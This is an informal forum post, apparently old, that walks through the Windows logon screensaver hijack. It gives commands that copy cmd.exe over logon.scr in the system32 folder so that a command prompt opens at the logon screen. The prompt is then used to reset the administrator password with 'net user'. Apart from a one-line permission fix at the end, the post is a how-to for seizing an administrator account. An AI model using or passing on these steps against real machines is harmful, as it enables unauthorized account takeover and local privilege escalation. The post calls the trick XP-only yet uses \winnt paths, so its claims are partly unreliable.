WOW windows sux.... Lol so many logon holes. Here is another.
I Belive that this is only for XP
I also belive that this a very well know hole but i decided to post it for the people who have never heard of it.

How it works.
When your PC on a logon screen and nothing is done for 10-15 minutes a LOGON SCREENSAVER is executed. What can happen is a user can replace that LOGON SCREENSAVER with the DOS PROMPT. What this will do is instead of running the screensave it will display the command prompt. Through the prompt they can easily change the ADMIN password and logon under that name.

HOW IT IS DONE
RUN>>COMMAND
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now all they would have to do is logoff the machine, wait 10-15 minutes then the DOS PROMPT should execute.
Lastly all they have to do is type "C:\> net user administrator <newpassword> " in the prompt and log in with the new account.

*FIX* change default permissions on C:\winnt and C:\winnt\system32 you should be golden.